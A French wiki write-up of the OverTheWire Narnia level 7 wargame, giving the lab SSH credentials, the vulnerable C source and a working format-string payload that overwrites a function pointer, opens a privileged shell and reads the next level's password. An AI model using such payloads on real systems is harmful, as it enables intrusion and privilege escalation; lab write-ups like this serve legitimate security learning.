Outils d'utilisateurs

Outils du Site


overthewire_narnia:level7

Level 7

ssh narnia7@narnia.labs.overthewire.org  
pass : ahkiaziphu
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
 
int goodfunction();
int hackedfunction();
 
int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();
 
        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);
 
        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
 
        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;
 
        snprintf(buffer, sizeof buffer, format);
 
        return ptrf();
}
 
int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}
 
int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);
 
        return 0;
}
 
int hackedfunction(){
        printf("Way to go!!!!");
	fflush(stdout);
        system("/bin/sh");
 
        return 0;
}

Une simple format string, il faut écrire l'adresse de hackedfunction dans la variable ptrf. La tâche est grandement facilité étant donné qu'on nous donne l'adresse de la variable.

$ ./narnia7 $(python -c 'print "l\xd6\xff\xffm\xd6\xff\xffn\xd6\xff\xffo\xd6\xff\xff%145c%6$hhn%229c%7$hhn%126c%8$hhn%4c%9$hhn"')
goodfunction() = 0x804867b
hackedfunction() = 0x80486a1

before : ptrf() = 0x804867b (0xffffd66c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ id
uid=14007(narnia7) gid=14007(narnia7) euid=14008(narnia8) groups=14008(narnia8),14007(narnia7)
$ cat /etc/narnia_pass/narnia8
mohthuphog
overthewire_narnia/level7.txt · Dernière modification: 2017/04/09 15:33 (modification externe)